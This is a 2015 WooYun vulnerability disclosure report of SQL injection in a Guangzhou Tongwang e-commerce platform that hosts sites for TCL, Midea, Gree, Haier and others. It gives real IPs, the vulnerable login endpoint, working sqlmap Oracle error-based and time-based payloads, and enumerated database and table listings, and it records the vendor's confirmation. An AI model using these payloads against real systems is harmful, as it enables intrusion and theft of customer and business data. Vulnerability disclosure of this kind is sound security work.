当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098403

漏洞标题:广州同望某平台SQL注入(导致TCL/美的/奔腾/海尔/万家乐/格力等企业平台数据泄露)

相关厂商:广州同望科技

漏洞作者: 几何黑店

提交时间:2015-02-26 14:27

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-26: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

恭喜发财,红包拿来
广州同望科技发展有限公司,是一家国内企业信息化管理平台软件及电子商务平台提供和运营商,公司提供“eTW电子商务管理、CRM营销管理、BMS管理平台、云ERP平台、OA协同办公、HR管理、电子招投标、SCM管理平台”等信息化产品及电商营销解决方案,并提供B2B供应链和分销链体系优化等运营服务,为核心厂商及上下游共生的产业圈提供供应链和分销链的深度整合,从而打造供应链和分销链竞争优势。

详细说明:

首先,看到 WooYun: TCL某网络分销平台弱口令致海量订单泄露,包括用户姓名、身份证、电话、家庭住址等敏感信息 这个洞,随便看了看,觉的应该有戏.于是.....
先从IP着手,120.132.154.5/120.132.154.17 恩?原来是个电子商务网络分销云平台,各大企业把二级域名指向了这个IP,IP对应的还有个etwowin.com.
启动猪猪侠的神器,开始扫描,一天以后......etwowin.com域名下的二级域名就出来了,都是些企业名命名的二级域名,

tcl.etwowin.com
fsbcss.etwowin.com
dual.etwowin.com
macro.etwowin.com
tclbjd.etwowin.com
povos.etwowin.com
mmg.etwowin.com
kqn.etwowin.com
bdcrm.etwowin.com
gree.etwowin.com
这些域名都是对应一些商家,比如
macro.etwowin.com 万家乐
MMG.etwowin.com 美的
gree.etwowin.com 格力
bdcrm.etwowin.com/ 广东必达
haierhb.etwowin.com 海尔


太多了,就不一一列举了.
接下来,发现http://120.132.154.5:8080/web/SubmitLogin.do 存在POST注入.参数value(userName)
用SQLMAP一跑,数据就出来了

Parameter: value(userName) (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: Submit=%e6%8f%90 %e4%ba%a4&value(entcode)=&value(entcode)=94102&value(isshop)=1&value(password)=g00dPa$$w0rD&value(userName)=1' AND 7714=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7714=7714) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'Rxqk'='Rxqk
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: Submit=%e6%8f%90 %e4%ba%a4&value(entcode)=&value(entcode)=94102&value(isshop)=1&value(password)=g00dPa$$w0rD&value(userName)=1' AND 2487=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(98)||CHR(65)||CHR(115),5) AND 'mHrF'='mHrF
---
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
available databases [44]:
[*] ACA
[*] AMITIME
[*] BOWEILE
[*] CLZ
[*] DBSNMP
[*] ESOEASY
[*] ETOWAY
[*] ETWBASE
[*] ETWINTF
[*] GJZX
[*] HZJE
[*] ITTAST
[*] JENS
[*] LETESAEL
[*] MACRO
[*] MACROOTO
[*] MACROSHOP
[*] MACROXJD
[*] NCA
[*] OPAY
[*] OUTLN
[*] POVOS
[*] POVOSFX
[*] POVOSPCP
[*] QINYUAN
[*] RSDFX
[*] SUNOJOY
[*] SYS
[*] SYSTEM
[*] TCLBX
[*] TCLBXNEW
[*] TCLKT
[*] TCLKTFX
[*] TCLXJD
[*] TSMSYS
[*] TW
[*] TW519
[*] TWAUTO
[*] TWESHOP
[*] TWFUWU
[*] TWFX
[*] TWMACRO
[*] WMSYS
[*] XXJD


数据库名都是企业名的缩写
让我们来看看有多少表和数据量

Database: TCLBX
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| CPCSYSLOG                      | 1386233 |
| SHOP_TB_WL_KC_DL               | 73261   |
| LOGINLOG                       | 54010   |
| SHOP_ORDER_H_CZGD              | 15767   |
| SHOP_ORDER_LINE_H_CZGD         | 14855   |
| SMS_BAK                        | 11322   |
| SHOP_ORDER_LINE                | 9286    |
| SHOP_ORDER                     | 9153    |
| SHOP_PACKAGE_FOLLOW            | 8160    |
| TMP_SHOP_ORDER                 | 7021    |
| SHOP_ORDER_LINE_HISTORY        | 4662    |
| SHOP_ORDER_HISTORY             | 4594    |
| CPCDOCH                        | 3989    |
| SHOP_REMIT_MONEY_HISTORY       | 3965    |
| CPCDOC                         | 3906    |
| SHOP_ENTCODE_AREA              | 3711    |
| BID_LOGIN_NODE                 | 3545    |
| SHOP_REMIT_MONEY               | 3388    |
| BAK_SHOP_INVENTORY             | 3060    |
| GXH_BAK                        | 2376    |
| CPCORGUSER                     | 1929    |
| TMP_PHONE                      | 1713    |
| CPCDICT                        | 1672    |
| MEMBER_FOLLOW                  | 1580    |
| SHOP_MEMBER_APPLY              | 1080    |
| CPCROLEUSER                    | 1027    |
| CPCUSERENT                     | 1001    |
| SHOP_COMPACT                   | 932     |
| CPCROLEMOD                     | 883     |
| SHOP_MEMBER                    | 802     |
| SHOP_INV_BILL_LINE             | 657     |
| SHOP_INV_BILL_HEAD             | 640     |
| CPCROLEOBJ                     | 626     |
| SHOP_SPECIALPRICE_LINE         | 622     |
| CPCSYSCONF                     | 584     |
| CPCATTACH                      | 583     |
| COMPARE_TABLE_ROWS             | 577     |
| SHOP_PRODUCT_PRICE_HISTORY     | 543     |
| CPCUSERPROFILE                 | 535     |
| SHOP_TRANSFER                  | 524     |
| CPCFDRREF                      | 495     |
| CPCPROCCONDTEMP                | 481     |
| CPCROLEMENUACL                 | 472     |
| SHOP_INVENTORY                 | 450     |
| CPCSHTCOL                      | 340     |
| CPCDRAWITEMREL                 | 312     |
| SHOP_SPECIALPRICE_HEADER       | 312     |
| SHOP_MEMBER_HISTORY            | 290     |
| CPCIDLIST                      | 271     |
| SHOP_PRODUCT_HISTORY           | 216     |
| PDM_DEFPROPSET                 | 203     |
| PDM_ITEMEXPPROP                | 200     |
| SHOP_OUT_BILL_LINE             | 191     |
| SHOP_OUT_BILL_HEAD             | 184     |
| PDM_ITEMEXPPROPH               | 171     |
| SHOP_PRODUCT_PRICE             | 159     |
| TMP_SHOP_MEMBER                | 151     |
| SHOP_IN_BILL_LINE_INTF         | 147     |
| SHOP_IN_BILL_HEAD_INTF         | 144     |
| CPCDOCCROSS                    | 130     |
| CPCOBJCONF                     | 129     |
| CPCUSERMOD                     | 129     |
| CPCWSOBJ                       | 124     |
| CPCWSREF                       | 111     |
| CPCUSER_BAK                    | 96      |
| AREA_WAREHOUSE                 | 94      |
| SHOP_MEMBER_MESSAGE            | 75      |
| CPCMOD                         | 74      |
| CPCSHTINS                      | 73      |
| PDM_KEYC                       | 65      |
| CPCCLASPROP                    | 61      |
| CPCWORKSPACE                   | 60      |
| CPC_REPORT                     | 59      |
| CPCENTEBS                      | 52      |
| SHOP_WAREHOUSE_HISTORY         | 50      |
| CPCSHTTABLE                    | 49      |
| SHOP_PRODUCT                   | 45      |
| CPCSHTPAGES                    | 44      |
| CPCUSERSHT                     | 44      |
| SHOP_CART                      | 44      |
| CPCSHORTCUT                    | 43      |
| SHOP_SPD_WAREHOUSE             | 43      |
| CPCOBJWFTEMP                   | 41      |
| CPCENTSCM                      | 36      |
| CPCMEMBERLEVELCONF             | 36      |
| CPCDOCMODEL                    | 35      |
| SHOP_AREA_WAREHOUSE_DEFAULT    | 35      |
| CPCOBJREFCONF                  | 30      |
| CPCUSERACL                     | 29      |
| CPCKEYC                        | 28      |
| CPCOBJPROPTMP                  | 28      |
| SHOP_FEE_TYPE                  | 28      |
| CPCCONTACTGLINE                | 27      |
| PDM_ITEMH                      | 26      |
| CPCROLEENT                     | 25      |
| CPCROLE                        | 24      |
| CPCAPP                         | 23      |
| CPCGROUPHEADER                 | 22      |
| PDM_ECNBOMHEAD                 | 21      |
| PDM_ECNBOMLINE                 | 21      |
| PDM_ITEMPROPCHAGELINE          | 21      |
| TEMP_MEMBER_DEVELOP_REPORT_Y_M | 21      |
| CPCCALEND                      | 20      |
| SHOP_PICKING_ORDERLINE         | 20      |
| CPCDOCTRK                      | 19      |
| CPCUSER_ORG                    | 19      |
| CPCFDR                         | 18      |
| CPCPOSITION                    | 17      |
| CPCPOSITIONWORK                | 17      |
| SHOP_WAREHOUSE                 | 17      |
| CPCORGPOSITION                 | 16      |
| SHOP_AREA_COURIER              | 16      |
| DELIVER_MESSAGE                | 15      |
| PDM_ITEMPROPCHAGEHEAD          | 15      |
| CPCGROUPLINE                   | 14      |
| CPCFDRH                        | 13      |
| SHOP_INFO                      | 12      |
| PDM_ITEMPROPCONF               | 11      |
| PDM_ITEMPROPCONF               | 11      |
| SHOP_MEMBER_LEVEL_HISTORY      | 11      |
| CPCWFPROCTYPE                  | 10      |
| CPCCODENODE                    | 9       |
| SHOP_MAIN_CUSTOMER             | 9       |
| SHOP_PRODUCT_TYPE              | 9       |
| SHOP_SALESMAN                  | 9       |
| CPCEMAIL                       | 8       |
| CPCEMAILTRK                    | 8       |
| CPCPRODUCT                     | 8       |
| PDM_DOCCLASTREE                | 8       |
| SHOP_MEMBER_LEVEL              | 8       |
| SHOP_PARAM                     | 7       |
| CPCCADWS                       | 6       |
| CPCORGACL                      | 6       |
| PDM_BOMD                       | 6       |
| SHOP_INVENTORY_DESC            | 6       |
| CPCCONTACT                     | 5       |
| CPCORG                         | 5       |
| RESULT_DATA                    | 5       |
| CPCCLAS                        | 4       |
| CPCNODEVALUE                   | 4       |
| CPCUSERAGENT                   | 4       |
| PDM_BOMCHANGEREASONTYPELINE    | 4       |
| PDM_ITEMRELOBJDEF              | 4       |
| SHOP_MEMBER_APPKEY             | 4       |
| SHOP_OUT_BILL_CHG_LINE         | 4       |
| SYSTEM_NOTICE_ENTCODE_LIST     | 4       |
| BILL_NUMBER                    | 3       |
| COMPANY_INFO                   | 3       |
| COMPANY_ORG                    | 3       |
| COMPANY_PARAMETER              | 3       |
| COMPANY_RELATION_HEAD          | 3       |
| CPCBBS                         | 3       |
| CPCCODE                        | 3       |
| CPCCONTACTG                    | 3       |
| CPCOBJWFRIGHT                  | 3       |
| CPCPUBGUSER                    | 3       |
| CPCRESOURCE                    | 3       |
| INVOICE_INF                    | 3       |
| SHOP_CUSTOMERSINTERFACE_LINE   | 3       |
| SHOP_ENTCODE_PAY_TYPE          | 3       |
| SHOP_PICKING_LINE              | 3       |
| SYSTEM_NOTICE                  | 3       |
| TENANT_CUSTOMER                | 3       |
| TENANT_CUSTOMER_ROLE           | 3       |
| USER_INFO                      | 3       |
| CPCDSSH                        | 2       |
| CPCFRMCONF                     | 2       |
| CPCPROJ                        | 2       |
| CPCSHTCHECK                    | 2       |
| CPCSHTWFPROC                   | 2       |
| TAOBAO_ITEM_RECORD             | 2       |
| TAOBAO_ITEM_RECORD_HISTORY     | 2       |
| CPCBOMVIEW                     | 1       |
| CPCCOUNTRY                     | 1       |
| CPCCUST                        | 1       |
| CPCDSS                         | 1       |
| CPCENT                         | 1       |
| CPCINVORG                      | 1       |
| CPCLOC                         | 1       |
| CPCPORTALENTMOD                | 1       |
| CPCPUBLISHG                    | 1       |
| CPCSEAPORT                     | 1       |
| CPCSYSAUTH                     | 1       |
| CPCUSERREL                     | 1       |
| CPCVAULT                       | 1       |
| RPTDS                          | 1       |
| SHOP_CUSTOMERSINTERFACE_HEADER | 1       |
| SHOP_ENTCODE_COURIER           | 1       |
| SHOP_PARMANT                   | 1       |
| SHOP_PICKING_HEAD              | 1       |
| SHOP_PRODUCT_TYPELINK          | 1       |
| SHOP_RETURN_REASON             | 1       |
| STAFFINFO                      | 1       |
| TMPCPCUSERIMPORT               | 1       |
+--------------------------------+---------+


800多个表.........
各大企业的平台数据一览无遗,还没完,我们不能到这里就打住了,继续挖掘

漏洞证明:

既然是云,那么可能C段还有点东西.
在http://120.132.154.7:88/上发现同样的系统,于是,依葫芦画瓢,在SQLMAP上直接把命令里的IP换成这个..结果又出来了

QQ图片20150226135036.png


数据库的数量少了点,只有41个.企业名有些不一样.

修复方案:

过滤

版权声明:转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-27 16:18

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:12
正在联系相关网站管理单位处置。

最新状态:

暂无